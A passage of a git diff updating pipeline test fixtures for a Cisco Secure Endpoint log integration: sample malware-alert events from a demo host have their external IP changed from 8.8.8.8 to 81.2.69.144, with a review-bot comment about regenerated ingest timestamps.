", + "ingested": "2021-12-09T13:35:32.898240100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296272", "kind": "alert", "start": "2021-01-15T10:17:41.000Z", @@ -3673,7 +3583,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3723,7 +3633,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3733,8 +3643,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070208933Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:32.898246200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3756,7 +3666,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3803,7 +3713,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3817,8 +3727,8 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-30T00:14:16.070210963Z",
- "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+ "ingested": "2021-12-09T13:35:32.898252Z",
+ "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
 "code": "1090519054",
 "kind": "alert",
 "action": "Threat Detected",
@@ -3840,7 +3750,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "disposition": "Malicious",
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log
index 4a0581fcd4d..33c5b6791ea 100644
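Review bot: `ingested` moves from `2021-09-30T00:14:16.070210963Z` to `2021-12-09T13:35:32.898252Z` here, as it does in the `@@ -3733,8 +3643,8 @@` hunk, which is wall-clock churn from regenerating the expected file rather than part of the IP substitution the commit describes. If this data stream's pipeline test config does not already list `event.ingested` under `dynamic_fields`, the comparison depends on the run time and will fail on the next regeneration; if it does, the value is matched by pattern and the churn is harmless but could be dropped from the commit so the diff shows only the IP change. The enclosing `event` object starts and ends outside this hunk.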
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log
@@ -1,45 +1,45 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 